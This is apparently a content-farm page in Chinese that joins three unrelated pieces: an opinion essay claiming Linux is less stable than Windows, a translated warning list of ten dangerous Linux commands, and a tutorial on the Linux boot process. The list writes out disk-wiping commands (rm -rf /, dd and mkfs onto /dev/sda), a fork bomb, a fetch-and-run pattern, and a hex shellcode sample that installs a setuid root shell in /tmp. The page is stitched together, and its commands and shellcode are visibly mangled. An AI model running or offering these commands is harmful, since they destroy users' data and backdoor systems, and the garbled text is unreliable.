linux 破坏 Linux杀毒软件

大家好，感谢邀请，今天来为大家分享一下linux 破坏的问题，以及和Linux杀毒软件的一些困惑，大家要是还不太明白的话，也没有关系，因为接下来将为大家分享，希望可以帮助到大家，解决大家的问题，下面就开始吧！

为什么有人说 Linux 比 Windows 稳定

首先，我的观点是Linux不如Windows稳定。

如果没人管的话，Linux不会比Windows稳定。

评价系统的稳定性一个很大的参考就是让外行人使用，观察系统的故障率。显然Linux比Windows更容易出现不可修复的损坏。

Windows具有更完善的故障排除机制和联锁设置，使其受误操作而损坏的概率更低，而且在受到较严重破坏时仍然有可能自行恢复。

Linux本身的故障排除机制就很弱，也没有什么合理的联锁，繁琐的操作反而增加了操作人员失误的风险，且Linux不具备自恢复的能力，往往在不经意间就种下了无法开机的种子。更为糟糕的是出现严重故障时操作人员还无法发现，必须等到下一次开机才会产生影响。

在服务器上，如果Windows没Linux稳定，还要收费，那么第一天就会被市场淘汰，根本不可能还会去开发后续的版本。

在桌面环境，Linux就像是个定时炸弹一样，不知道什么时候就会自己失灵。如果不是为了研究Linux，个人用户根本没那个时间去修理，所以Linux在桌面端几乎没什么人在用。

在移动端，其实Windows也可以做得更好，只不过移动端需要适应大量的非标硬件，所以微软也没那个能力去搞好。移动端的主流是安卓。安卓的流行不完全是因为免费，免不免费的我们用户根本看不见。iOS虽然不免费，但是人家也不卖啊，Windows则是天生不怎么适应移动端，功能有限不代表它的稳定性不行。安卓的流行更重要原因的是硬件平台的多样性，使苹果和微软都没办法兼顾全局。其实大家都知道安卓稳定性是很差的，突然自动重启、自己杀死进程的事情经常发生，苹果并不完全是奢侈品，人家就是稳定性上好一些，Windows移动版是功能实在太差才没什么人用，也不是稳定性问题。

在嵌入式方面，Windows内核太大了，无法存进单片机里，所以只能用Linux。我们说的ucLinux主要也就是一个内核，Wndows内核也是开源的，只是太大了才没办法用，所以这里没办法比较了。虽然没办法比较，但是搞嵌入式的人应该都懂，ucLinux不过也是个月球表面。

现在第二点要说说Linux稳定的言论是怎么回事。

做工控的都知道像西门子、施耐德、欧姆龙、三菱、ABB这样的大厂都是大杂烩。而那些几十人的作坊和工程公司则很喜欢说自己是专业做什么的。有心人就会发现所谓的专业其实就是能力不足的委婉说法。对于公司如此，对于个人也是如此。你看毛主席、牛顿、亚里士多德、钱学森虽然不是全才，但哪个是专业的？所谓的专业指的是装配工、农民、刷墙的。

说这个的意思有两点，一是所谓的Linux比Windows稳定不过是Linux系统真的很不行的委婉说法。另外一点就是，你觉得几十人的小公司真比西门子专业吗？乡下种地的又比钱学森之流厉害多少？你觉得Linux本身有可能会比Windows稳定吗？说实话就是这种言论根本就不可信。

第三点就是服务器Linux的实绩确实比桌面Windows稳定。这又是为什么呢？

很简单的道理就可以让你的Windows变得超级无敌稳定，只要也像Linux服务器一样，雇佣几个系统管理员，专门给你的Windows系统做维护，系统必须的软件安装完成以后不再安装会改变注册表的软件，把你的PC机放到无尘恒温室里，静电保护防雷保护UPS该上的全上了，不要关机，平常就那么整天开着，每个月再定期维护。买个备用的PC机，一主一备，搞个热备份的硬盘阵列，装一个硬件防火墙，网络用1Gbps的光纤。我保证你的Windows系统不光比Linux系统稳定，甚至于几乎无法用软件手段在外部把你的PC给搞崩。要是再在你亲戚朋友家安装一套一样的远程备用机组，保证你的Windows无敌了。

Linux执行的10个最危险的命令是哪些

Linux命令行佷有用、很高效，也很有趣，但有时候也很危险，尤其是在你不确定你自己在正在做什么时候。这篇文章并不打算引来你对Linux或linux命令行的愤怒。我们只是想让你意识到在你运行某些命令时应该三思而后行。（译注：当然，以下命令通常都是在root权限下才能将愚蠢发挥到无可救药；在普通用户身份下，破坏的只是自己的一亩三分地。）

1. rm-rf命令

rm-rf命令是删除文件夹及其内容最快的方式之一。仅仅一丁点的敲错或无知都可能导致不可恢复的系统崩坏。下列是一些rm命令的选项。

rm命令在Linux下通常用来删除文件。

rm-r命令递归的删除文件夹，甚至是空的文件夹。（译注：个人认为此处应该是说错了，从常识看，应该是“甚至是非空的文件夹”）

rm-f命令能不经过询问直接删除‘只读文件’。（译注：Linux下删除文件并不在乎该文件是否是只读的，而只是在意其父目录是否有写权限。所以，-f这个参数只是表示不必一个个删除确认，而是一律悄悄删除。另外，原始的rm命令其实也是没有删除提示的，只是一般的发行版都会将rm通过别名的方式增加-i参数来要求删除确认，而-f则抑制了这个提示。）

rm-rf/:强制删除根目录下所有东东。（就是说删除完毕后，什么也没有了。。。）

rm-rf*:强制删除当前目录的所有文件。

rm-rf.:强制删除当前文件夹及其子文件夹。

从现在起，当你要执行rm-rf命令时请留心一点。我们可以在“.bashrc”文件对‘rm‘命令创建rm-i的别名，来预防用‘rm‘命令删除文件时的事故，它会要求你确认每一个删除请求。（译注：大多数发行版已经这样做了，如果还没有，请这样做，并在使用-f参数前一定考虑好你在做什么！译者本人有着血泪的教训啊。）

2.:(){:|:&};:命令

这就是个fork炸弹的实例。具体操作是通过定义一个名为‘:‘的函数，它会调用自己两次，一次在前台另一次运行在后台。它会反复的执行下去直到系统崩溃。

:(){:|:&};:哦？你确认你要试试么？千万别在公司正式的服务器上实验啊~~

3.命令>/dev/sda

上列命令会将某个‘命令‘的输出写到块设备/dev/sda中。该操作会将在块设备中的所有数据块替换为命令写入的原始数据，从而导致整个块设备的数据丢失。

4. mv文件夹/dev/null

这个命令会移动某个‘文件夹‘到/dev/null。在Linux中/dev/null或null设备是一个特殊的文件，所有写入它的数据都会被清除，然后返回写操作成功。（译注：这就是黑洞啊。当然，要说明的是，通过将文件夹移动到黑洞，并不能阻止数据恢复软件的救赎，所以，真正的彻底毁灭，需要采用专用的软件或者手法来完成——我知道你肯定有些东西想删除得干干净净的。）

# mv/home/user/*/dev/null上列命令会将User目录所有内容移动到/dev/null，这意味着所有东西都被‘卷入’黑洞(null)之中。

5. wget sh

上列命令会从一个（也许是）恶意源下载一个脚本并执行。Wget命令会下载这个脚本，而sh会（无条件的）执行下载下来的脚本。

注意:你应该时刻注意你下载包或脚本的源。只能使用那些从可信任的源中下载脚本/程序。（译注：所以，你真的知道你在做什么吗？当遇到这种需要是，我的做法是，先wget下来，然后我去读一读其中到底写了些什么，然后考虑是否执行。）

6. mkfs.ext3/dev/sda

上列命令会格式化块设备‘sda’，你无疑知道在执行上列命令后你的块设备(硬盘驱动器)会被格式化，崭新的!没有任何数据，直接让你的系统达到不可恢复的阶段。（译注：通常不会直接使用/dev/sda这样的设备，除非是作为raw设备使用，一般都需要将sda分成类似sda1、sda2这样的分区后才使用。当然，无论你使用sda还是sda1，这样对块设备或分区进行mkfs都是毁灭性的，上面的数据都会被蒸发了。）

7.> file

上列命令常用来清空文件内容（译注：通常也用于记录命令输出。不过请在执行前，确认输出的文件是空的或者还不存在，否则原来的文件可真是恢复不了了——连数据恢复软件都未必能帮助你了。另外，我想你可能真正想用的是“>>”，即累加新的输出到文件，而不是刷新那个文件。）。如果用上列执行时输入错误或无知的输入类似“> xt.conf”的命令会覆盖配置文件或其他任何的系统配置文件。

8. ^foo^bar

这个命令在我们十个鲜为人知的Linux命令- Part 3中描述过，用来编辑先前运行的命令而无需重打整个命令。但当用foobar命令时如果你没有彻底检查改变原始命令的风险，这可能导致真正的麻烦。（译注：事实上，这种小技巧是译者认为的，少数史前时代遗留下来的无用而有害的“黑客”技巧。）

9. dd if=/dev/random of=/dev/sda

上列命令会向块设备sda写入随机的垃圾文件从而擦出数据。当然！你的系统可能陷入混乱和不可恢复的状态。（译注：记得上面说过mv到黑洞并不能彻底删除数据么？那么这个命令就是给了你一个彻底删除的方法！当然为了保险起见，你可以覆写多次。）

10.隐藏命令

下面的命令其实就是上面第一个命令(rm-rf)。这里的代码是隐藏在十六进制里的,一个无知的用户可能就会被愚弄。在终端里运行下面命令可能会擦除你的根分区。

这个命令表明通常真正的危险是隐藏的，不会被轻易的检测到。你必须时刻留心你在做什么结果会怎样。不要编译/运行从未知来源的代码。

char esp[] __attribute__((section(“.text”)))/* e.s.p

release*/

=“ë>[1ÀPTZƒìdh″

“ÿÿÿÿhßÐßÙh™″

“ßh’ßÒT^÷÷″

“V÷V÷VƒÄtV″

“sVSTY°Í€1″

“À@ëùè½ÿÿÿ/bi″

“n/sh-c″

“cp-p/bin/sh/tmp/.beyond; chmod 4755

/tmp/.beyond;”;注意:不要在你的或你的同学或学校的电脑里的Linux终端或Shell执行以上的任何一个命令。如果你想测试它们，请在虚拟机上运行。任何不和谐或数据丢失，由于运行上面的命令导致你的系统崩溃，文章作者和Tecmint概不负责。（译注：译者和转载网站也不负责~！）

linux 开机问题求助

一、BIOS加电自检

当你按电源开关开机时,电脑会首先去启动BIOS(基本输入输出系统),BIOS一般是集成在主板上的.

BIOS的工作

1.检测连接硬件,比如显卡,内存,磁盘等等,检测的目的是以后把这些设备信息提供给操作系统

2.寻找启动磁盘,每一种BIOS都会有开机启动菜单,可以在菜单里设置以哪个设备启动系统

比如:光驱,硬盘,网络等等,这个菜单可以设置多个选项,依照设置次序在设备上寻找启动信息

3.找到了启动硬盘,接着BIOS就会在磁盘上找启动扇区,找到内核启动系统.

1)先试着寻找第一个扇区,也就是主引导记录MBR(Master Boot Record)

2)如果第一个扇区上没有没有存在操作系统,再去寻找标记为BOOT的分区.

不论是MBR还是BOOT分区,存储操作系统的空间都只有446字节;

如果没有在上面提到的位置找到操作系统的内核,那么BIOS就无法继续启动工作.

而我们的内核往往会大于446个字节,存放在磁盘的其他位置上,既然446装不下内核,又为了能顺利的找到放在其他位置上的内核,

人们想出了一个办法就在446字节里写了一个小程序,当BIOS试着启动操作系统时就会执行这个小程序,然后再由小程序来载入其他位置的内核.这个小程序就是启动载入器(boot loader)

二、BOOT Loader

linux的boot loader(上文提到的小程序)常见的有两种:lilo grub

因为lilo存在着一个1024柱面的限制,并且更改了磁盘上的启动信息文件后需要重新启动系统才能同步446字节的内容,因为lilo的缺陷,已经被grub所取代.现在的绝大多数类linux系统都采用grub做boot loader;

grub则没有了lilo各种限制,而且方便到能修改系统文件的启动内容就可以立刻与446内容同步.

那么我们就看看grub的内容它存在于/boot/grub中

GRUB有几个重要的文件，STAGE1、STAGE1.5、STAGE2

STAGE1：它只有512字节，通常放在MBR中，它的作用很简单，就是在系统启动时用于装载STAGE2并将控制权交给它。

STAGE2：GRUB的核心，所有的功能都是由它实现。

STAGE1.5：介于STAGE1和STAGE2之间，是它们的桥梁，因为STAGE2较大，通常都是放在一个文件系统当中的，但是STAGE1并不能识别文件系统格式，

所以才需要STAGE1.5来引导位于某个文件系统当中的STAGE2。根据文件系统格式的不同，STAGE1.5也需要相应的文件，如：e2fs_stage1_5，fat_stage1_5，分别用于识别ext和fat的文件系统格式。它存放于1-63的柱面之间.

引导顺序如下：STAGE1->;STAGE1.5->;STAGE2，

主要的配置文件时 grub.conf

里面选项含义:

title:一个操作系统引动的标头,可以使多个

root:指明所需文件存在于哪个磁盘哪个分区上(hd0,0)表示第一个硬盘,第一个分区,可参考/boot/grub/device.map

kernel:内核文件的名字,并且会有一些加载内核时的参数 or代表以只读方式加载

initrd:包含一些附加的驱动程序

三、内核启动

内核启动后会向bios查询电脑的所有硬件信息,然后自己接手下来管理这些设备,以便提供给linux使用

内核会试着驱动这些设备,这些设备的驱动一部分包含在内核中,叫做静态驱动,一部分以模块的方式(动态)存放文件系统中,由

于此时还未挂载任何文件系统,因此还不能使用文件系统中的模块,这里只能驱动在内核中存在的硬件驱动程序的对应设备.想驱动内核中未包含的硬件驱动就需要加载文件系统.

内核会尝试挂载根文件系统,根文件系统至少包含/etc/bin/sbin/lib/dev这5大目录

他们5个缺一不可.都会导致系统无法启动

根文件系统挂载是以只读方式挂载的,因为这时linux还在启动阶段,并不稳定,避免破坏系统资料

四、启动INIT服务

顺利的挂载了根文件系统后,就会启动init服务

内核会按/sbin/init/etc/init/bin/init顺序寻找init程序,

如果找不到则内核报错这里存在一个参数 init=/bin/sh如果启动时指定了则最后执行/bin/sh

而不会产生内核报错.也被称为快速启动,因为它忽略了很多启动初始化工作.

启动init的目的就是为了初始化系统环境,启动了init就证明了内核已经顺利启动,接下来就由init服务来建立linux使用环境

init做了什么?它会读取/etc/inittab文件,根据这个文件的信息来进行初始化工作.

会执行三个脚本/etc/rc.d/rc.sysinit/etc/rc.d/rc/etc/rc.d/rc.local

rc.sysinit主要的功能用来建立系统的基本环境

启动udev selinux子系统

udev负责产生/dev中的文件,selinux负责增强系统的安全性

设定核心参数 sysctl-p加载/etc/sysctl.conf

设定系统时间将硬件时间设定为系统时间

加载键盘和交换分区 swapon-a-e

设置主机名,挂载文件系统,并将根重新挂载为可读写的.

加载动态驱动模块

USB设备与RAID& LVM

卸载/initrd/目录

rc脚本设置启动级别 linux中有许多不同的启动级别,不同的启动级别会制定不同的服务

根据指定rc的参数会对应执行/etc/rc.d/rc[0-6].d/中的连接脚本文件以S开头的则启动

rc.local前两个脚本都是系统至关重要的脚本,如果我们想在启动过程中放置一些其他程序

应该使用rc.local脚本中因为S99local存在于rc[2-5].d中

三个RC脚本执行完毕后,就会建立虚拟主控制台执行/bin/login就提供了用户登陆界面了

如果是图形 L5级别的话,会启动X window登录界面

所有的启动就都已经完毕

用户环境初始化

输入用户名和密码系统验证,然后会执行

/etc/profile

/etc/profile.d/*.sh$HOME/.bash_profile

/etc/bashrc

$HOME/.bashrc

启动级别

0关机

1单用户

2多用户模式但带网络但不能远程登录

3不受限多用户模式 TUI

4保留

5图形模式

6重新启动

查看启动级别

# runlevel

N 3

N是上次的级别,3是当前级别也就是说机器开机就是3级别

切换级别

init 5

挂载文件系统

/etc/fstab

第一项是要mount的存储装置的实体位置或者用卷标

第二项要挂到哪个目录位置

第三项指定要挂载的系统格式

第四项 mount时要设定的状态，只读或defauls

第五项提供DUMP功能，在系统DUMP时需要BACKUP的标志位，其内定位置是 0

第六项设定开机时文件系统是否要check

除了root的文件系统其必要的check为1其他视需要而定默认是0

LABEL=/boot/boot ext3 defaults 1 2

作者“xudeqiang”